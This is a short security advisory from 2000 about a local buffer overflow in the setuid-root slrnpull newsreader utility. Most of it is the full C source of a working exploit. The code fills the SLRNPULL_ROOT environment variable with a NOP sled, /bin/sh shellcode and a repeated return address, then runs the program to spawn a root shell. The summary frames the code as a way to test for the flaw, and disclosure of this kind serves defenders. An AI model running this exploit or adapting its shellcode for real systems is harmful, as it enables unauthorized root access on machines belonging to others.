Slrnpull exploit code has been released (SLRNPULL_ROOT)
20 Oct. 2000
Summary
Slrnpull is used for pulling of news posts from NNTP news server, so it enables slrn to be used as offline newsreader. A security vulnerability in the product allows local users to overflow one of the environment variables (SLRNPULL_ROOT) and cause the application to execute arbitrary code. Since the program is setuid root, elevated privileges can be gained. The exploit code below can be used to test for this problem.
Credit:
The information has been provided by Vade79.
Exploit:
/* (linux)slrnpull[slrn_v0.9.6.2-] buffer overflow, by v9[v9@fakehalo.org]. i
made this after i viewed Michal Zalewski's "rh 6.2 - gid compromises, etc"
(posted: Wed Jun 21 2000 06:54:08) text on bugtraq. according to his text
slrnpull among other programs is exploitable. so, i downloaded the source
and scanned through it to write little exploit for it.
note: there didn't appear to be any set*gid() code in the source, execpt
mentions of it, so i'm just using generic (non-set*id) shellcode.
also, i just plucked one of the ways to overflow this: -d(spooldir)
option, NNTPSERVER environment variable, etc. overflow. the main slrn
program has many overflows as well. offsets should range from 1200
to 2900. (roughly)
*/
#define FILENAME "slrnpull" // (which) slrnpull filename to execute.
#define BUFFER 2048 // buffer size used to overflow.
#define DEFAULT_OFFSET 1750 // default offset, argv option.
#define DEFAULT_ALIGN 1 // default align, argv option.
static char exec[]=
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56"
"\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80"
"\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01"; // still 01.
long sp(void){__asm__("movl %esp,%eax");} // where offset is add/sub from.
void execute(){
char cmd[256];
snprintf(cmd,256,"`which %s`",FILENAME);
system(cmd);
}
int main(int argc,char **argv){
char bof[BUFFER];
int i,offset,align;
long ret;
printf("[ slrnpull[slrn_v0.9.6.2-] local buffer overflow, by: v9[v9@fakehalo.o"
"rg]. ]\n");
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
if(argc>2){
if(atoi(argv[2])>3||atoi(argv[2])<0){
printf("*** invalid alignment value(%s), using internal default: %d. (0-3)\n"
,argv[2],DEFAULT_ALIGN);
align=DEFAULT_ALIGN;
}
else{align=atoi(argv[2]);}
}
else{align=DEFAULT_ALIGN;}
ret=(sp()+offset);
printf("[ return address: 0x%lx, offset: %d, address alignment: %d. ]\n"
,ret,offset,align);
for(i=align;i<BUFFER;i+=4){*(long *)&bof[i]=ret;}
for(i=0;i<(BUFFER-strlen(exec)-100);i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
bof[BUFFER]='\0';
setenv("SLRNPULL_ROOT",bof,1);
execute();
exit(0);
}
